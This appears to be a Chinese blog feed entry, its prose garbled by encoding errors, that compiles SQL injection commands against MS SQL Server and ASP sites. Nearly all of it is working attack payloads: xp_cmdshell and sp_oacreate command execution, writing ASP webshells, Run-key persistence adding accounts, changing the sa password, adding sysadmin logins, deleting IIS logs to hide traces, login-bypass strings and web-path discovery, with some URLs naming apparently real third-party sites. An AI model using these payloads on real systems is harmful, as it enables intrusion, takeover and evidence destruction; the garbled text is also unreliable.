锘??xml version="1.0" encoding="utf-8" standalone="yes"?>亚洲视频免费在线,先锋亚洲精品,久久一综合视频http://m.shnenglu.com/elva/category/4146.htmlzh-cnWed, 21 May 2008 07:47:35 GMTWed, 21 May 2008 07:47:35 GMT60鏈璇︾粏鐨凷QL娉ㄥ叆鐩稿叧鐨勫懡浠ゆ暣鐞?http://m.shnenglu.com/elva/archive/2007/10/22/34820.html鍙跺瓙鍙跺瓙Mon, 22 Oct 2007 01:41:00 GMThttp://m.shnenglu.com/elva/archive/2007/10/22/34820.htmlhttp://m.shnenglu.com/elva/comments/34820.htmlhttp://m.shnenglu.com/elva/archive/2007/10/22/34820.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/34820.htmlhttp://m.shnenglu.com/elva/services/trackbacks/34820.htmlQUOTE:
1銆?  鐢╚杞箟瀛楃鏉ュ啓ASP(涓鍙ヨ瘽鏈ㄩ┈)鏂囦歡鐨勬柟娉?
?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--

?   echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

2銆?  鏄劇ずSQL緋葷粺鐗堟湰錛?
?   http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Microsoft VBScript 緙栬瘧鍣ㄩ敊璇?閿欒 '800a03f6'
緙哄皯 'End'
/iisHelp/common/500-100.asp錛岃242
Microsoft OLE DB Provider for ODBC Drivers 閿欒 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp錛岃17
3銆?  鍦ㄦ嫻嬬儲(chǔ)灝間腑鍥界殑緗戠珯婕忔礊鏃訛紝鍒嗘槑宸茬粡紜畾浜?jiǎn)婕弸z炲瓨鍦ㄥ嵈鏃犳硶鍦ㄨ繖涓夌婕忔礊涓壘鍒板搴旂殑綾誨瀷銆傚伓鐒墮棿鎴戞兂鍒頒簡(jiǎn)鍦⊿QL璇█涓彲浠ヤ嬌鐢?#8220;in”鍏抽敭瀛楄繘琛屾煡璇紝渚嬪“select * from mytable where id in(1)”錛屾嫭鍙蜂腑鐨勫煎氨鏄垜浠彁浜ょ殑鏁版嵁錛屽畠鐨勭粨鏋滀笌浣跨敤“select * from mytable where id=1”鐨勬煡璇㈢粨鏋滃畬鍏ㄧ浉鍚屻傛墍浠ヨ闂〉闈㈢殑鏃跺欏湪URL鍚庨潰鍔犱笂“) and 1=1 and 1 in(1”鍚庡師鏉ョ殑SQL璇彞灝卞彉鎴愪簡(jiǎn)“select * from mytable where id in(1) and 1=1 and 1 in(1)”錛岃繖鏍峰氨浼?xì)鍑虹幇鏈熷緟宸蹭箙鐨剻宓闈簡(jiǎn)銆傛殏涓斿氨鍙繖縐嶇被鍨嬬殑婕忔礊涓?#8220;鍖呭惈鏁板瓧鍨?#8221;鍚э紝鑱槑鐨勪綘涓瀹氭兂鍒頒簡(jiǎn)榪樻湁“鍖呭惈瀛楃鍨?#8221;鍛€傚浜?jiǎn)锛屽畠灏辨槸鐢变簬绫讳?#8220;select * from mytable where name in(‘firstsee’)”鐨勬煡璇㈣鍙ラ犳垚鐨勩?br>
4銆?  鍒ゆ柇xp_cmdshell鎵╁睍瀛樺偍榪囩▼鏄惁瀛樺湪錛?br>http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
鎭㈠xp_cmdshell鎵╁睍瀛樺偍鐨勫懡浠わ細(xì)
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell',’e:\inetput\web\xplog70.dll’;--

5銆?  鍚戝惎鍔ㄧ粍涓啓鍏ュ懡浠よ鍜屾墽琛岀▼搴忥細(xì)
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'


6銆?  鏌ョ湅褰撳墠鐨勬暟鎹簱鍚嶇О錛?br>?   http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) n鏀規(guī)垚0,1,2,3……灝卞彲浠ヨ法搴撲簡(jiǎn)
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript 緙栬瘧鍣ㄩ敊璇?閿欒 '800a03f6'
緙哄皯 'End'
/iisHelp/common/500-100.asp錛岃242
Microsoft OLE DB Provider for ODBC Drivers 閿欒 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp錛岃17
7銆?  鍒楀嚭褰撳墠鎵鏈夌殑鏁版嵁搴撳悕縐幫細(xì)
select * from master.dbo.sysdatabases   鍒楀嚭鎵鏈夊垪鐨勮褰?br>select name from master.dbo.sysdatabases 浠呭垪鍑簄ame鍒楃殑璁板綍

8銆?  涓嶉渶xp_cmdshell鏀寔鍦ㄦ湁娉ㄥ叆婕忔礊鐨凷QL鏈嶅姟鍣ㄤ笂榪愯CMD鍛戒護(hù)錛?br>CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--娉ㄦ剰run鐨勫弬鏁皌rue鎸囩殑鏄皢絳夊緟紼嬪簭榪愯鐨勭粨鏋滐紝瀵逛簬綾諱技ping鐨勯暱鏃墮棿鍛戒護(hù)蹇呴渶浣跨敤姝ゅ弬鏁般?br>
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--鍥犱負(fù)fso鐨刼pentextfile鏂規(guī)硶灝嗚繑鍥炰竴涓猼extstream瀵硅薄錛屾墍浠ユ鏃禓file鏄竴涓璞′護(hù)鐗?br>
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

浠ヤ笅鏄竴琛岄噷闈㈠皢WEB鐢ㄦ埛鍔犲埌綆$悊鍛樼粍涓細(xì)
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

浠ヤ笅鏄竴琛屼腑鎵цEXE紼嬪簭錛?br>DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

SQL涓嬩笁縐嶆墽琛孋MD鍛戒護(hù)鐨勬柟娉曪細(xì)

鍏堝垹闄?.18鍙鋒棩蹇楋細(xì)
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

錛?錛夐鍏堝紑鍚痡et娌欑洏妯″紡錛岄氳繃鎵╁睍瀛樺偍榪囩▼xp_regwrite淇敼娉ㄥ唽琛ㄥ疄鐜幫紝綆$悊鍛樹(shù)慨鏀規(guī)敞鍐岃〃涓嶈兘棰勯槻鐨勫師鍥犮傚嚭浜庡畨鍏ㄥ師鍥狅紝榛樿娌欑洏妯″紡鏈紑鍚紝榪欏氨鏄負(fù)浠涔堥渶瑕亁p_regwrite鐨勫師鍥狅紝鑰寈p_regwrite鑷沖皯闇瑕丏B_OWNER鏉冮檺錛屼負(fù)浜?jiǎn)鏂逛究锛寴q欓噷寤鴻浣跨敤sysadmin鏉冮檺嫻嬭瘯錛?br>?   exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
娉細(xì)
0   紱佹涓鍒囷紙榛樿錛?br>1   浣胯兘璁塊棶ACCESS錛屼絾鏄姝㈠叾瀹?br>2   紱佹璁塊棶ACCESS錛屼絾鏄嬌鑳藉叾浠?br>3   浣胯兘涓鍒?br>
?   榪欓噷浠呯粰鍑簊ysadmin鏉冮檺涓嬩嬌鐢ㄧ殑鍛戒護(hù)錛?br>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


?   寤虹珛閾炬帴鏁版嵁搴?L0op8ack'鍙傝冨懡浠わ細(xì)
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

?   濡備綍浣跨敤閾炬帴鏁版嵁搴擄細(xì)

浣跨敤榪欎釜鏂瑰紡鍙互鎵ц錛屼絾鏄緢涓嶅垢錛孌B_OWNER鏉冮檺鏄笉澶熺殑錛岄渶瑕佽嚦灝憇ysadmin鏉冮檺鎴栬卻ecurityadmin+setupadmin鏉冮檺緇勫悎
sp_addlinkedserver闇瑕乻ysadmin鎴杝etupadmin鏉冮檺
sp_addlinkedsrvlogin闇瑕乻ysadmin鎴杝ecurityadmin鏉冮檺
鏈緇堝彂鐜幫紝榪樻槸sa鏉冮檺鎴栬卻etupadmin+securityadmin鏉冮檺甯愭埛鎵嶈兘浣跨敤錛?br>涓鑸病鏈夊摢涓鐞嗗憳榪欎箞璁劇疆鏅氬笎鎴鋒潈闄愮殑

瀹炵敤鎬т笉寮猴紝浠呬綔涓轟竴涓涔?fàn)鎬葷粨鍚?br>
澶ц嚧榪囩▼濡備笅錛屽鏋滀笉鏄痵ysadmin錛岄偅涔圛AS.mdb鏉冮檺楠岃瘉浼?xì)鍑洪敊锛?br>鎴戞祴璇曠殑鏃跺欐巿浜坔acker榪欎釜鐢ㄦ埛setupadmin+securityadmin鏉冮檺錛屼嬌鐢╥as.mdb澶辮觸
闇瑕佹壘涓涓竴鑸敤鎴峰彲璁塊棶鐨刴db鎵嶅彲浠ワ細(xì)

?   鏂板緩閾炬帴鏈嶅姟鍣?#8221;L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
?   exec sp_addlinkedsrvlogin 'L0op8ack','false';--鎴?br>exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
?   SELECT * FROM OPENQUERY(L0op8ack, 'SELECT shell("cmd.exe /c net user")');--
?   exec sp_droplinkedsrvlogin 'L0op8ack','false';--
?   exec sp_dropserver 'L0op8ack';--

鍐嶈冭礉涓涓叾瀹冩枃浠舵潵浠f浛7.18鏃ユ枃浠訛細(xì)
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

9銆?  鐢║PDATE鏉ユ洿鏂拌〃涓殑鏁版嵁錛?br>HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
www鐢ㄦ埛瀵嗙爜鐨?6浣峂D5鍊間負(fù)錛歛0b923820dcc509a錛屽嵆鎶婂瘑鐮佹敼鎴?錛?br>32浣峂D5鍊間負(fù)錛?  錛屽瘑鐮佷負(fù)

10銆?  鍒╃敤琛ㄥ唴瀹瑰鎴愭枃浠跺姛鑳?br>SQL鏈塀CP鍛戒護(hù)錛屽畠鍙互鎶婅〃鐨勫唴瀹瑰鎴愭枃鏈枃浠跺茍鏀懼埌鎸囧畾浣嶇疆銆傚埄鐢ㄨ繖欏瑰姛鑳斤紝鎴戜滑鍙互鍏堝緩涓寮犱復(fù)鏃惰〃錛岀劧鍚庡湪琛ㄤ腑涓琛屼竴琛屽湴杈撳叆涓涓狝SP鏈ㄩ┈錛岀劧鍚庣敤BCP鍛戒護(hù)瀵煎嚭褰㈡垚ASP鏂囦歡銆?br>鍛戒護(hù)琛屾牸寮忓涓嬶細(xì)
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'鍙傛暟涓烘墽琛屾煡璇㈢殑鏈嶅姟鍣紝'U'鍙傛暟涓虹敤鎴峰悕錛?P'鍙傛暟涓哄瘑鐮侊紝鏈緇堜笂浼犱簡(jiǎn)涓涓猺uncommand.asp鐨勬湪椹?銆?br>
11銆佸垱寤鴻〃銆佹挱鍏ユ暟鎹拰璇誨彇鏁版嵁鐨勬柟娉?br>?   鍒涘緩琛細(xì)
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
?   寰琛ㄩ噷鎾叆鏁版嵁錛?br>' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
?   浠庤〃閲岃鍙栨暟鎹細(xì)
' and 1=(select count(*) from cyfd where gyfd >1)--

?   鍒犻櫎涓存椂琛細(xì)
';drop table cyfd;--

12銆侀氳繃SQL璇彞鐩存帴鏇存敼sa鐨勫瘑鐮侊細(xì)
?   update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,榪欐牱sa鐨勫瘑鐮佸氨琚垜浠敼鎴愪簡(jiǎn)111111鎷夈傚懙鍛碉紝瑙e喅鐨勬柟娉曞氨鏄妸sa緇欏垹鎷夈傦紝鎬庝箞鍒犲彲浠ュ弬鑰冩垜鐨勩婂畬鍏ㄥ垹闄a榪欎釜鍚庨棬銆嬨?br>
?   鏌ョ湅鏈満鎵鏈夌殑鏁版嵁搴撶敤鎴峰悕錛?br>select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins

?   鏇存敼sa鍙d護(hù)鏂規(guī)硶錛氱敤sql緇煎悎鍒╃敤宸ュ叿榪炴帴鍚庯紝鎵ц鍛戒護(hù)錛?br>exec sp_password NULL,'鏂板瘑鐮?,'sa'

13銆佹煡璇vbbs搴撲腑鎵鏈夌殑琛ㄥ悕鍜岃〃緇撴瀯錛?br>?   select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
?   select * from dvbbs.dbo.syscolumns where id=1426104121

14銆佹墜宸ュ浠藉綋鍓嶆暟鎹簱錛?br>瀹屽叏澶囦喚錛?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
宸紓澶囦喚錛?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT鈥?br>
15銆佹坊鍔犲拰鍒犻櫎涓涓猄A鏉冮檺鐨勭敤鎴穞est錛?br>exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

cmd.exe /c isql -E /U alma /P /i K:\test.qry

16銆乻elect * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
灝卞彲浠ュ垪鍑哄簱ChouYFD涓墍鏈夌殑鐢ㄦ埛寤虹珛鐨勮〃鍚嶃?br>Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0

17銆?br>?   http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns 錛坵here id=1234錛?br>鍒楀嚭rdweb搴撲腑鎵鏈夎〃涓殑瀛楁鍚嶇О
?   select * from dvbbs.dbo.syscolumns where id=5575058
鍒楀嚭搴揹vbbs涓〃id=5575058鐨勬墍鏈夊瓧孌靛悕

18銆佸垹闄よ褰曞懡浠わ細(xì)delete from Dv_topic where boardid=5 and topicid=7978

19銆佺粫榪囩櫥褰曢獙璇佽繘鍏ュ悗鍙扮殑鏂規(guī)硶鏁寸悊錛?br>1) ' or''='
2) ' or 1=1--
3) ‘ or ‘a’=’a--
4) ‘or’=’or’
5) " or 1=1--
6錛塷r 1=1--
7錛?or ’a=’a
8錛? or "a"="a
9錛?’) or (’a’=’a
10錛?") or ("a"="a
11錛?錛?or (1=1
12) 'or''='
13) 浜烘皵%’ and 1=1 and ’%’=’

20銆佸鎵劇綉绔欒礬寰勭殑鏂規(guī)硶姹囨伙細(xì)
1錛夋煡鐪媁EB緗戠珯瀹夎鐩綍鍛戒護(hù)錛?br>?   cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt 錛堝皢2鎹㈡垚1銆?銆?銆?璇曡瘯錛?br>type c:\test1.txt
del c:\test1.txt
鍦∟BSI涓嬪彲浠ョ洿鎺ユ樉紺鴻繍琛岀粨鏋滐紝鎵浠ヤ笉鐢ㄥ鍑哄埌鏂囦歡

2錛夊湪緗戠珯涓婇殢渚挎壘鍒頒竴涓浘鐗囩殑鍚嶅瓧 123.jpg
鐒跺悗鍐欒繘鎵瑰鐞嗙▼搴?23.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt

鎵ц鍚?type c:\123.txt
榪欐牱鏉ュ垎鏋愮綉绔欑殑璺緞

3錛塖QL鏈嶅姟鍣ㄥ拰緗戠珯鏈嶅姟鍣ㄥ湪鍚屼竴涓湇鍔″櫒涓婏紝濂戒簡(jiǎn)鏄彲浠ユ墽琛屽懡浠ゆ槸鍚э紵
灝嗘墽琛屽懡浠よ緭鍑虹粨鏋滃埌
%windir%\help\iishelp\common\404b.htm鎴栬?00.asp
娉ㄦ剰杈撳嚭鍓岯ackup榪欎袱涓枃浠?br>濡傦細(xì)
dir c:\ >%windir%\help\iishelp\common\404b.htm
鐒跺悗闅忎究杈撳叆涓涓枃浠舵潵璁塊棶錛歨ttp://鐩爣ip/2.asp

4錛夐拡瀵箇in2000緋葷粺錛歺p_regread璇誨彇HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 鑾峰彇WEB璺緞
2003緋葷粺錛歺p_regread璇誨彇錛屾湭鎵懼埌鏂規(guī)硶
濡傦細(xì)
錛?錛?  鏂板緩涓涓〃cyfd(瀛楁涓篻yfd)錛?a target=_blank>http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
錛?錛?  鎶妛eb璺緞鍐欒繘鍘?http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
錛?錛?  榪樻槸璁╀粬涓嶅尮閰嶏紝鏄劇ず閿欒:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: 灝?varchar 鍊?'Y:\Web\鐑熷彴浜烘墠鐑嚎鍚庡彴綆$悊緋葷粺,,201 ' 杞崲涓烘暟鎹被鍨嬩負(fù) int 鐨勫垪鏃跺彂鐢熻娉曢敊璇?br>TargeSite: Boolean Read() 鍝堝搱鍝堛傘傝礬寰勬毚闇蹭簡(jiǎn)銆傘?br>錛?錛夋帴涓嬫潵鍒犻櫎琛?http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--

5錛夌敤regedit鍛戒護(hù)瀵煎嚭娉ㄥ唽琛紝灝嗗鍑虹殑緇撴灉淇濆瓨鐨勮礬寰勫埌%windir%\help\iishelp\common\404b.htm鎴栬?00.asp欏甸潰
regedit鍛戒護(hù)璇存槑錛?br>Regedit /L:system /R:user /E filename.reg Regpath
鍙傛暟鍚箟錛?br>/L錛歴ystem鎸囧畾System.dat鏂囦歡鎵鍦ㄧ殑璺緞銆?br>/R錛歶ser鎸囧畾User.dat鏂囦歡鎵鍦ㄧ殑璺緞銆?br>/E錛氭鍙傛暟鎸囧畾娉ㄥ唽琛ㄧ紪杈戝櫒瑕佽繘琛屽鍑烘敞鍐岃〃鎿嶄綔錛屽湪姝ゅ弬鏁板悗闈㈢┖涓鏍鹼紝杈撳叆瀵煎嚭娉ㄥ唽琛ㄧ殑鏂囦歡鍚嶃?br>Regpath錛氱敤鏉ユ寚瀹氳瀵煎嚭鍝釜娉ㄥ唽琛ㄧ殑鍒嗘敮錛屽鏋滀笉鎸囧畾錛屽垯灝嗗鍑哄叏閮ㄦ敞鍐岃〃鍒嗘敮銆傚湪榪欎簺鍙傛暟涓紝"/L錛歴ystem"鍜?/R錛歶ser"鍙傛暟鏄彲閫夐」錛屽鏋滀笉浣跨敤榪欎袱涓弬鏁幫紝娉ㄥ唽琛ㄧ紪杈戝櫒鍒欒涓烘槸瀵?a class=wordstyle target=_blank>WINDOWS鐩綍涓嬬殑"system.dat"鍜?user.dat"鏂囦歡榪涜鎿嶄綔銆傚鏋滄槸閫氳繃浠庤蔣鐩樺惎鍔ㄥ茍榪涘叆DOS錛岄偅涔堝氨蹇呴』浣跨敤"/L"鍜?/R"鍙傛暟鏉ユ寚瀹?system.dat"鍜?user.dat"鏂囦歡鐨勫叿浣撹礬寰勶紝鍚﹀垯娉ㄥ唽琛ㄧ紪杈戝櫒灝嗘棤娉曟壘鍒板畠浠傛瘮濡傝錛屽鏋滈氳繃鍚姩鐩樿繘鍏OS錛屽垯澶囦喚娉ㄥ唽琛ㄧ殑鍛戒護(hù)鏄?Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",璇ュ懡浠ょ殑鎰忔濇槸鎶婃暣涓敞鍐岃〃澶囦喚鍒?a class=wordstyle target=_blank>WINDOWS鐩綍涓嬶紝鍏舵枃浠跺悕涓?regedit.reg"銆傝屽鏋滆緭鍏ョ殑鏄?regedit /E D:\regedit.reg"榪欐潯鍛戒護(hù)錛屽垯鏄鎶婃暣涓敞鍐岃〃澶囦喚鍒癉鐩樼殑鏍圭洰褰曚笅錛堢渷鐣ヤ簡(jiǎn)"/L"鍜?/R"鍙傛暟錛夛紝鍏舵枃浠跺悕涓?Regedit.reg"銆?br>
regedit /s c:\adam.reg 錛堝鍏:\adam.reg鏂囦歡鑷蟲(chóng)敞鍐岃〃錛?br>regedit /e c:\web.reg 錛堝浠藉叏閮ㄦ敞鍐屽唴瀹瑰埌c:\web.reg涓級(jí)
閽堝win2000緋葷粺錛欳:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
鐒跺悗http://鐩爣IP/2.asp
閽堝win2003緋葷粺錛氭病鏈夋壘鍒幫紝甯屾湜鎵懼埌鐨勬湅鍙嬪叕甯冨嚭鏉ヤ竴璧瘋璁恒?br>
6錛夎櫄鎷熶富鏈轟笅%SystemRoot%\system32\inetsrv\MetaBack\涓嬬殑鏂囦歡鏄痠is鐨勫浠芥枃浠訛紝鏄厑璁竪eb鐢ㄦ埛璁塊棶鐨勶紝濡傛灉浣犵殑iis澶囦喚鍒拌繖閲岋紝鐢╳ebshell涓嬭澆涓嬫潵鍚庣敤璁頒簨鏈墦寮錛屽彲浠ヨ幏鍙栧搴旂殑鍩熷悕鍜寃eb緇濆璺緞銆?br>
7錛塖QL娉ㄥ叆寤虹珛铏氭嫙鐩綍錛屾湁dbo鏉冮檺涓嬫壘涓嶅埌web緇濆璺緞鐨勪竴縐嶈В鍐沖姙娉曪細(xì)
鎴戜滑寰堝鎯呭喌涓嬮兘閬囧埌SQL娉ㄥ叆鍙互鍒楃洰褰曞拰榪愯鍛戒護(hù)錛屼絾鏄嵈寰堜笉瀹規(guī)槗鎵懼埌web鎵鍦ㄧ洰褰曪紝涔熷氨涓嶅ソ寰楀埌涓涓獁ebshell錛岃繖涓鎷涗笉閿欙細(xì)
?   寤虹珛铏氭嫙鐩綍win,鎸囧悜c:\winnt\system32錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
?   璁﹚in鐩綍鍏鋒湁瑙f瀽asp鑴氭湰鏉冮檺錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:'
?   鍒犻櫎铏氭嫙鐩綍win錛歟xec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
?   嫻嬭瘯錛?a target=_blank>http://127.0.0.1/win/test.asp
